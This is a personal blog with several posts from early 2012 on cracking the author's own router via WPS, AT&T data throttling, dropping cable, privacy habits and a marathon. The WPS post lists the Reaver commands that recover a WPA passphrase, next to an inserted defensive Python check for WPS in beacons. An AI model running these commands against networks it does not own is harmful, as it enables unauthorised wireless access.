
29
Feb 12

Wireless has stopped being safe, again

I just broke the WPA encryption of my router, without having to be connected to it.

BackTrack 5 with Reaver, from Tactical Solutions, did it. It was easy as pie.
Boot BackTrack 5
Install BackTrack 5
Boot BackTrack 5 from laptop
Attach an Atheros card to computer
Run 4 commands:
airmon-ng start wlan0
apt-get update
apt-get install reaver
reaver -i mon0 -b Mac-address-access-point -vv

And 4 hours later I had the name of the access point, the WPS access code and the WPA passphrase. I get the actual passphrase, not some hash to pass around. I get into the mind of the administrator of that access point: what they are thinking, and what heights they go to when it comes to security. Password1 says a lot about you. Youw0ntbreakTh3passW0rdofth!s4cc3sspoint says even more.

Thanks to Tactical Solutions, we need to bring our A game to protect the wireless network. The culprit? WPS, or Wi-Fi Protected Setup. A good idea with some flaws in the implementation. My Cisco router? Guilty. Can I deactivate WPS? I thought I did that already by setting the network manually. Cisco, firmware update please. The last update for the E1000 was in May of 2011. Or, can I move the guts of my router to OpenWrt, which doesn’t support WPS? Yep, another afternoon in the cave…
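One way to answer "did I really deactivate WPS?" for your own router is to look at what its beacon advertises rather than at the admin page. The sketch below is an added example, not part of the original post: it parses the tagged parameters of a beacon and reports whether a WPS element is present. The helper names and the sample byte strings are constructed for illustration, and it assumes you already have the beacon's information-element bytes from a capture of your own access point.

```python
import struct

WPS_OUI_TYPE = bytes.fromhex("0050f204")  # vendor IE: OUI 00:50:F2, type 4 = WPS
ATTR_VERSION = 0x104A
ATTR_WPS_STATE = 0x1044                   # 1 = not configured, 2 = configured
ATTR_AP_SETUP_LOCKED = 0x1057             # 1 = AP currently refuses external PIN attempts

def iter_tlv(buf, hdr):
    """Yield (type, value) pairs; hdr is the struct format of the type+length header."""
    size, pos = struct.calcsize(hdr), 0
    while pos + size <= len(buf):
        t, length = struct.unpack_from(hdr, buf, pos)
        pos += size
        if pos + length > len(buf):
            raise ValueError("truncated element")
        yield t, buf[pos:pos + length]
        pos += length

def wps_status(beacon_ies):
    """Return None if the beacon carries no WPS element, else a dict of its state."""
    for tag, body in iter_tlv(beacon_ies, "BB"):      # 802.11 IE: 1-byte id, 1-byte length
        if tag == 0xDD and body[:4] == WPS_OUI_TYPE:
            attrs = dict(iter_tlv(body[4:], ">HH"))   # WPS attribute: 2-byte id, 2-byte length
            return {"configured": attrs.get(ATTR_WPS_STATE) == b"\x02",
                    "locked": attrs.get(ATTR_AP_SETUP_LOCKED) == b"\x01"}
    return None

# --- constructed sample data (hypothetical SSID, not from a real capture) ---
def ie(tag, body):
    return bytes([tag, len(body)]) + body

def attr(attr_id, value):
    return struct.pack(">HH", attr_id, len(value)) + value

SSID = ie(0, b"homenet")
WPS_BASE = WPS_OUI_TYPE + attr(ATTR_VERSION, b"\x10") + attr(ATTR_WPS_STATE, b"\x02")
BEACON_WPS_ON = SSID + ie(0xDD, WPS_BASE)
BEACON_WPS_LOCKED = SSID + ie(0xDD, WPS_BASE + attr(ATTR_AP_SETUP_LOCKED, b"\x01"))
# A different vendor element (OUI type 1) must not be mistaken for WPS.
BEACON_WPS_OFF = SSID + ie(0xDD, bytes.fromhex("0050f201") + b"\x01\x00")

if __name__ == "__main__":
    for name, ies in [("on", BEACON_WPS_ON), ("locked", BEACON_WPS_LOCKED),
                      ("off", BEACON_WPS_OFF)]:
        print(name, wps_status(ies))
```

A return value of `None` is the result you want after disabling WPS; any dict means the radio still advertises it, whatever the configuration page says.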

Boy, I love when the crazy ideas get implemented so quickly.


16
Feb 12

Rewriting the rules for Unlimited Data

I got this letter from AT&T this morning. Apparently I use too much data. I am a historic unlimited data usage person. I got into the plan early and stuck to it through bad coverage and dropped calls; AT&T’s coverage was poised to improve.

Like other wireless companies, AT&T is taking steps to manage exploding demand for mobile data. We’re responding on many levels, including investing billions in our wireless network this year and working to acquire more network capacity.

As mentioned on a previous bill, we’re also taking additional, more immediate steps to help address network congestion and improve reliability. One of these steps involves a change for some customers who use extraordinarily large amounts of data in a single billing period – about 12 times more data than the average smartphone user.

For the current billing cycle, your data usage indicates you could be affected by this change. Here’s how it works:

Smartphone customers with unlimited data plans may experience reduced speeds once their usage in a billing cycle reaches the level that puts them among the top 5 percent of heaviest data users. These customers can still use unlimited data and their speeds will be restored with the start of the next billing cycle.

We’re writing because you are in the top 5 percent of heaviest data users for this billing cycle. Because we recognize that data usage can change from month to month, you will not see reduced speeds this billing cycle.

Beginning with your next billing cycle, we’ll send you a text message if you are approaching the top 5 percent of heaviest data users. We’ll also send you a second text message if you cross into the top 5 percent of heaviest users, at which point you may see reduced speeds for the rest of the month.

Customers have several ways to manage extremely high data usage.

Wi-Fi offers great speeds and doesn’t add to your wireless data usage. Consider using Wi-Fi when possible for applications that use the highest amounts of data, such as streaming video apps, remote web camera apps, large data-file transfers (like video) and some online gaming.

You may also consider switching to a tiered data plan if speed is more important to you than having an unlimited data plan. Customers on tiered plans can pay for more data if they need it, and will not see reduced speeds.

To estimate how much data different activities use, and find out more about Wi-Fi or tiered data plans, visit https://www.att.com/dataplans or call Customer Care at 800-331-0500.

I have unlimited data. Let me use it. Learn from me how to improve bandwidth usage, the way Amazon does.

Did you see that the email doesn’t state the upper limit of the data usage? It is just the 5% of heaviest users. As users dial down their data usage, they bring that maximum back to the median. And this means that the 2GB Plan for corporate users now looks promising, because they are capped at a fixed value, not a month-to-month threshold. Have I reached the 2GB mark by February 14th? Is this a pre-emptive strike?

This means moving forward on plan B: an OpenWrt router that directs all the wireless traffic through an SSH tunnel, through the corporate firewall. Most of the knowledge is in place, but the pieces don’t fit together yet.

Fucking AT&T…


11
Feb 12

Life without cable

We were expecting a riot, mayhem, piles of dirty underwear for us to pick up. We got 10 minutes of uneasiness, it doesn’t work, change the channel, find the OTHER remote. And then, a beeline to Netflix. There was no denial or anger. Just plain acceptance. I need to learn from these two.


01
Feb 12

About privacy

Privacy: do we have the right to privacy in a social net? It is an oxymoron. How can you claim privacy when using Facebook? How can someone be so moronic as to use the Like button and claim privacy? Even the business model of LinkedIn, I find, shares too much.

What is my business? My business is to get as much as possible giving away as little as possible. Google is not here to give me search results. It is here to make money out of good searches. And it is in the business of gathering information about us: what we read, buy, talk about or visit. And what we search, of course; what our immediate needs are. So what again is my business? To provide a small footprint for every data gatherer. I use Gmail, but I download the email to a mail client before reading it. I never search logged into a Gmail account, because the searches are associated with the email and IP address. Ah, the IP address, how to fix that problem? After the recent spate of digital lockers going down, I set the servers to use an SSH tunnel into France or Luxembourg, so the Google searches are stored towards a machine in France. Still, what about Amazon? That is trickier, since they are my provider of choice on the net. But I’ll think of something. In the meantime, enjoy a life while not facebooking.


01
Feb 12

Houston Marathon

To those who care, I ran the marathon in 4:24:50. It was better than anticipated by my peers and close to my practice runs. 10:08 min/mile pace is not such a bad one. Since I went to do the weekly grocery shopping later in the day and then I went to drink beers with fellow runners, I decided to run again this March, at The Woodlands marathon. And so the training continues.